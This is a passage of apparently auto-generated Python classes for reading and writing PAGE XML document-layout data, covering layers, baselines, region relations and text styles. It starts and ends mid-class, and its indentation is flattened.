self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
if Layer is None:
self.Layer = []
else:
self.Layer = Layer
self.Layer_nsprefix_ = "pc"
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, LayersType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if LayersType.subclass:
return LayersType.subclass(*args_, **kwargs_)
else:
return LayersType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_Layer(self):
return self.Layer
def set_Layer(self, Layer):
self.Layer = Layer
def add_Layer(self, value):
self.Layer.append(value)
def insert_Layer_at(self, index, value):
self.Layer.insert(index, value)
def replace_Layer_at(self, index, value):
self.Layer[index] = value
def hasContent_(self):
if (
self.Layer
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='LayersType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('LayersType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'LayersType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='LayersType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='LayersType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='LayersType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='LayersType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for Layer_ in self.Layer:
namespaceprefix_ = self.Layer_nsprefix_ + ':' if (UseCapturedNS_ and self.Layer_nsprefix_) else ''
Layer_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Layer', pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
if nodeName_ == 'Layer':
obj_ = LayerType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.Layer.append(obj_)
obj_.original_tagname_ = 'Layer'
# end class LayersType
class LayerType(GeneratedsSuper):
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('id', 'string', 0, 0, {'use': 'required'}),
MemberSpec_('zIndex', 'int', 0, 0, {'use': 'required'}),
MemberSpec_('caption', 'string', 0, 1, {'use': 'optional'}),
MemberSpec_('RegionRef', 'RegionRefType', 1, 0, {'maxOccurs': 'unbounded', 'minOccurs': '1', 'name': 'RegionRef', 'type': 'RegionRefType'}, None),
]
subclass = None
superclass = None
def __init__(self, id=None, zIndex=None, caption=None, RegionRef=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
self.id = _cast(None, id)
self.id_nsprefix_ = None
self.zIndex = _cast(int, zIndex)
self.zIndex_nsprefix_ = None
self.caption = _cast(None, caption)
self.caption_nsprefix_ = None
if RegionRef is None:
self.RegionRef = []
else:
self.RegionRef = RegionRef
self.RegionRef_nsprefix_ = "pc"
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, LayerType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if LayerType.subclass:
return LayerType.subclass(*args_, **kwargs_)
else:
return LayerType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_RegionRef(self):
return self.RegionRef
def set_RegionRef(self, RegionRef):
self.RegionRef = RegionRef
def add_RegionRef(self, value):
self.RegionRef.append(value)
def insert_RegionRef_at(self, index, value):
self.RegionRef.insert(index, value)
def replace_RegionRef_at(self, index, value):
self.RegionRef[index] = value
def get_id(self):
return self.id
def set_id(self, id):
self.id = id
def get_zIndex(self):
return self.zIndex
def set_zIndex(self, zIndex):
self.zIndex = zIndex
def get_caption(self):
return self.caption
def set_caption(self, caption):
self.caption = caption
def hasContent_(self):
if (
self.RegionRef
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='LayerType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('LayerType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'LayerType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='LayerType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='LayerType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='LayerType'):
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.id), input_name='id')), ))
if self.zIndex is not None and 'zIndex' not in already_processed:
already_processed.add('zIndex')
outfile.write(' zIndex="%s"' % self.gds_format_integer(self.zIndex, input_name='zIndex'))
if self.caption is not None and 'caption' not in already_processed:
already_processed.add('caption')
outfile.write(' caption=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.caption), input_name='caption')), ))
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='LayerType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for RegionRef_ in self.RegionRef:
namespaceprefix_ = self.RegionRef_nsprefix_ + ':' if (UseCapturedNS_ and self.RegionRef_nsprefix_) else ''
RegionRef_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='RegionRef', pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('zIndex', node)
if value is not None and 'zIndex' not in already_processed:
already_processed.add('zIndex')
self.zIndex = self.gds_parse_integer(value, node, 'zIndex')
value = find_attr_value_('caption', node)
if value is not None and 'caption' not in already_processed:
already_processed.add('caption')
self.caption = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
if nodeName_ == 'RegionRef':
obj_ = RegionRefType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.RegionRef.append(obj_)
obj_.original_tagname_ = 'RegionRef'
# end class LayerType
class BaselineType(GeneratedsSuper):
"""Confidence value (between 0 and 1)"""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('points', 'pc:PointsType', 0, 0, {'use': 'required'}),
MemberSpec_('conf', 'pc:ConfSimpleType', 0, 1, {'use': 'optional'}),
]
subclass = None
superclass = None
def __init__(self, points=None, conf=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
self.points = _cast(None, points)
self.points_nsprefix_ = None
self.conf = _cast(float, conf)
self.conf_nsprefix_ = None
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, BaselineType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if BaselineType.subclass:
return BaselineType.subclass(*args_, **kwargs_)
else:
return BaselineType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_points(self):
return self.points
def set_points(self, points):
self.points = points
def get_conf(self):
return self.conf
def set_conf(self, conf):
self.conf = conf
def validate_PointsType(self, value):
# Validate type pc:PointsType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
if not self.gds_validate_simple_patterns(
self.validate_PointsType_patterns_, value):
self.gds_collector_.add_message('Value "%s" does not match xsd pattern restrictions: %s' % (encode_str_2_3(value), self.validate_PointsType_patterns_, ))
validate_PointsType_patterns_ = [['^(([0-9]+,[0-9]+ )+([0-9]+,[0-9]+))$']]
def validate_ConfSimpleType(self, value):
# Validate type pc:ConfSimpleType, a restriction on float.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, float):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (float)' % {"value": value, "lineno": lineno, })
return False
if value < 0:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd minInclusive restriction on ConfSimpleType' % {"value": value, "lineno": lineno} )
result = False
if value > 1:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd maxInclusive restriction on ConfSimpleType' % {"value": value, "lineno": lineno} )
result = False
def hasContent_(self):
if (
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='BaselineType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('BaselineType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'BaselineType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='BaselineType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='BaselineType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='BaselineType'):
if self.points is not None and 'points' not in already_processed:
already_processed.add('points')
outfile.write(' points=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.points), input_name='points')), ))
if self.conf is not None and 'conf' not in already_processed:
already_processed.add('conf')
outfile.write(' conf="%s"' % self.gds_format_float(self.conf, input_name='conf'))
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='BaselineType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('points', node)
if value is not None and 'points' not in already_processed:
already_processed.add('points')
self.points = value
self.validate_PointsType(self.points) # validate type PointsType
value = find_attr_value_('conf', node)
if value is not None and 'conf' not in already_processed:
already_processed.add('conf')
value = self.gds_parse_float(value, node, 'conf')
self.conf = value
self.validate_ConfSimpleType(self.conf) # validate type ConfSimpleType
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
pass
# end class BaselineType
class RelationsType(GeneratedsSuper):
"""Container for one-to-one relations between layout
objects (for example: DropCap - paragraph, caption -
image)."""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('Relation', 'RelationType', 1, 0, {'maxOccurs': 'unbounded', 'minOccurs': '1', 'name': 'Relation', 'type': 'RelationType'}, None),
]
subclass = None
superclass = None
def __init__(self, Relation=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
if Relation is None:
self.Relation = []
else:
self.Relation = Relation
self.Relation_nsprefix_ = "pc"
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, RelationsType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if RelationsType.subclass:
return RelationsType.subclass(*args_, **kwargs_)
else:
return RelationsType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_Relation(self):
return self.Relation
def set_Relation(self, Relation):
self.Relation = Relation
def add_Relation(self, value):
self.Relation.append(value)
def insert_Relation_at(self, index, value):
self.Relation.insert(index, value)
def replace_Relation_at(self, index, value):
self.Relation[index] = value
def hasContent_(self):
if (
self.Relation
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='RelationsType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('RelationsType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'RelationsType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='RelationsType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='RelationsType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='RelationsType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='RelationsType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for Relation_ in self.Relation:
namespaceprefix_ = self.Relation_nsprefix_ + ':' if (UseCapturedNS_ and self.Relation_nsprefix_) else ''
Relation_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Relation', pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
if nodeName_ == 'Relation':
obj_ = RelationType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.Relation.append(obj_)
obj_.original_tagname_ = 'Relation'
# end class RelationsType
class RelationType(GeneratedsSuper):
"""One-to-one relation between to layout object. Use 'link'
for loose relations and 'join' for strong relations
(where something is fragmented for instance).
Examples for 'link': caption - image floating -
paragraph paragraph - paragraph (when a paragraph is
split across columns and the last word of the first
paragraph DOES NOT continue in the second paragraph)
drop-cap - paragraph (when the drop-cap is a whole word)
Examples for 'join': word - word (separated word at the
end of a line) drop-cap - paragraph (when the drop-cap
is not a whole word) paragraph - paragraph (when a
pragraph is split across columns and the last word of
the first paragraph DOES continue in the second
paragraph)
For generic use"""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('id', 'string', 0, 0, {'use': 'required'}),
MemberSpec_('type_', 'typeType1', 0, 1, {'use': 'optional'}),
MemberSpec_('custom', 'string', 0, 1, {'use': 'optional'}),
MemberSpec_('comments', 'string', 0, 1, {'use': 'optional'}),
MemberSpec_('Labels', 'LabelsType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'Labels', 'type': 'LabelsType'}, None),
MemberSpec_('SourceRegionRef', 'RegionRefType', 0, 0, {'maxOccurs': '1', 'minOccurs': '1', 'name': 'SourceRegionRef', 'type': 'RegionRefType'}, None),
MemberSpec_('TargetRegionRef', 'RegionRefType', 0, 0, {'maxOccurs': '1', 'minOccurs': '1', 'name': 'TargetRegionRef', 'type': 'RegionRefType'}, None),
]
subclass = None
superclass = None
def __init__(self, id=None, type_=None, custom=None, comments=None, Labels=None, SourceRegionRef=None, TargetRegionRef=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
self.id = _cast(None, id)
self.id_nsprefix_ = None
self.type_ = _cast(None, type_)
self.type__nsprefix_ = None
self.custom = _cast(None, custom)
self.custom_nsprefix_ = None
self.comments = _cast(None, comments)
self.comments_nsprefix_ = None
if Labels is None:
self.Labels = []
else:
self.Labels = Labels
self.Labels_nsprefix_ = "pc"
self.SourceRegionRef = SourceRegionRef
self.SourceRegionRef_nsprefix_ = "pc"
self.TargetRegionRef = TargetRegionRef
self.TargetRegionRef_nsprefix_ = "pc"
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, RelationType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if RelationType.subclass:
return RelationType.subclass(*args_, **kwargs_)
else:
return RelationType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_Labels(self):
return self.Labels
def set_Labels(self, Labels):
self.Labels = Labels
def add_Labels(self, value):
self.Labels.append(value)
def insert_Labels_at(self, index, value):
self.Labels.insert(index, value)
def replace_Labels_at(self, index, value):
self.Labels[index] = value
def get_SourceRegionRef(self):
return self.SourceRegionRef
def set_SourceRegionRef(self, SourceRegionRef):
self.SourceRegionRef = SourceRegionRef
def get_TargetRegionRef(self):
return self.TargetRegionRef
def set_TargetRegionRef(self, TargetRegionRef):
self.TargetRegionRef = TargetRegionRef
def get_id(self):
return self.id
def set_id(self, id):
self.id = id
def get_type(self):
return self.type_
def set_type(self, type_):
self.type_ = type_
def get_custom(self):
return self.custom
def set_custom(self, custom):
self.custom = custom
def get_comments(self):
return self.comments
def set_comments(self, comments):
self.comments = comments
def validate_typeType1(self, value):
# Validate type typeType1, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['link', 'join']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on typeType1' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def hasContent_(self):
if (
self.Labels or
self.SourceRegionRef is not None or
self.TargetRegionRef is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='RelationType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('RelationType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'RelationType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='RelationType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='RelationType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='RelationType'):
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.id), input_name='id')), ))
if self.type_ is not None and 'type_' not in already_processed:
already_processed.add('type_')
outfile.write(' type=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.type_), input_name='type')), ))
if self.custom is not None and 'custom' not in already_processed:
already_processed.add('custom')
outfile.write(' custom=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.custom), input_name='custom')), ))
if self.comments is not None and 'comments' not in already_processed:
already_processed.add('comments')
outfile.write(' comments=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.comments), input_name='comments')), ))
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='RelationType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for Labels_ in self.Labels:
namespaceprefix_ = self.Labels_nsprefix_ + ':' if (UseCapturedNS_ and self.Labels_nsprefix_) else ''
Labels_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Labels', pretty_print=pretty_print)
if self.SourceRegionRef is not None:
namespaceprefix_ = self.SourceRegionRef_nsprefix_ + ':' if (UseCapturedNS_ and self.SourceRegionRef_nsprefix_) else ''
self.SourceRegionRef.export(outfile, level, namespaceprefix_, namespacedef_='', name_='SourceRegionRef', pretty_print=pretty_print)
if self.TargetRegionRef is not None:
namespaceprefix_ = self.TargetRegionRef_nsprefix_ + ':' if (UseCapturedNS_ and self.TargetRegionRef_nsprefix_) else ''
self.TargetRegionRef.export(outfile, level, namespaceprefix_, namespacedef_='', name_='TargetRegionRef', pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('type', node)
if value is not None and 'type' not in already_processed:
already_processed.add('type')
self.type_ = value
self.validate_typeType1(self.type_) # validate type typeType1
value = find_attr_value_('custom', node)
if value is not None and 'custom' not in already_processed:
already_processed.add('custom')
self.custom = value
value = find_attr_value_('comments', node)
if value is not None and 'comments' not in already_processed:
already_processed.add('comments')
self.comments = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
if nodeName_ == 'Labels':
obj_ = LabelsType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.Labels.append(obj_)
obj_.original_tagname_ = 'Labels'
elif nodeName_ == 'SourceRegionRef':
obj_ = RegionRefType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.SourceRegionRef = obj_
obj_.original_tagname_ = 'SourceRegionRef'
elif nodeName_ == 'TargetRegionRef':
obj_ = RegionRefType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.TargetRegionRef = obj_
obj_.original_tagname_ = 'TargetRegionRef'
# end class RelationType
class TextStyleType(GeneratedsSuper):
"""Monospace (fixed-pitch, non-proportional) or
proportional font.
For instance: Arial, Times New Roman.
Add more information if necessary
(e.g. blackletter, antiqua).
Serif or sans-serif typeface.
The size of the characters in points.
The x-height or corpus size refers to the distance
between the baseline and the mean line of
lower-case letters in a typeface.
The unit is assumed to be pixels.
The degree of space (in points) between
the characters in a string of text.
Text colour in RGB encoded format
(red value) + (256 x green value) + (65536 x blue value).
Background colour
Background colour in RGB encoded format
(red value) + (256 x green value) + (65536 x blue value).
Specifies whether the colour of the text appears
reversed against a background colour.
Line style details if "underlined" is TRUE"""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('fontFamily', 'string', 0, 1, {'use': 'optional'}),
MemberSpec_('serif', 'boolean', 0, 1, {'use': 'optional'}),
MemberSpec_('monospace', 'boolean', 0, 1, {'use': 'optional'}),
MemberSpec_('fontSize', 'float', 0, 1, {'use': 'optional'}),
MemberSpec_('xHeight', 'integer', 0, 1, {'use': 'optional'}),
MemberSpec_('kerning', 'int', 0, 1, {'use': 'optional'}),
MemberSpec_('textColour', 'pc:ColourSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('textColourRgb', 'integer', 0, 1, {'use': 'optional'}),
MemberSpec_('bgColour', 'pc:ColourSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('bgColourRgb', 'integer', 0, 1, {'use': 'optional'}),
MemberSpec_('reverseVideo', 'boolean', 0, 1, {'use': 'optional'}),
MemberSpec_('bold', 'boolean', 0, 1, {'use': 'optional'}),
MemberSpec_('italic', 'boolean', 0, 1, {'use': 'optional'}),
MemberSpec_('underlined', 'boolean', 0, 1, {'use': 'optional'}),
MemberSpec_('underlineStyle', 'pc:UnderlineStyleSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('subscript', 'boolean', 0, 1, {'use': 'optional'}),
MemberSpec_('superscript', 'boolean', 0, 1, {'use': 'optional'}),
MemberSpec_('strikethrough', 'boolean', 0, 1, {'use': 'optional'}),
MemberSpec_('smallCaps', 'boolean', 0, 1, {'use': 'optional'}),
MemberSpec_('letterSpaced', 'boolean', 0, 1, {'use': 'optional'}),
]
subclass = None
superclass = None
def __init__(self, fontFamily=None, serif=None, monospace=None, fontSize=None, xHeight=None, kerning=None, textColour=None, textColourRgb=None, bgColour=None, bgColourRgb=None, reverseVideo=None, bold=None, italic=None, underlined=None, underlineStyle=None, subscript=None, superscript=None, strikethrough=None, smallCaps=None, letterSpaced=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
self.fontFamily = _cast(None, fontFamily)
self.fontFamily_nsprefix_ = None
self.serif = _cast(bool, serif)
self.serif_nsprefix_ = None
self.monospace = _cast(bool, monospace)
self.monospace_nsprefix_ = None
self.fontSize = _cast(float, fontSize)
self.fontSize_nsprefix_ = None
self.xHeight = _cast(int, xHeight)
self.xHeight_nsprefix_ = None
self.kerning = _cast(int, kerning)
self.kerning_nsprefix_ = None
self.textColour = _cast(None, textColour)
self.textColour_nsprefix_ = None
self.textColourRgb = _cast(int, textColourRgb)
self.textColourRgb_nsprefix_ = None
self.bgColour = _cast(None, bgColour)
self.bgColour_nsprefix_ = None
self.bgColourRgb = _cast(int, bgColourRgb)
self.bgColourRgb_nsprefix_ = None
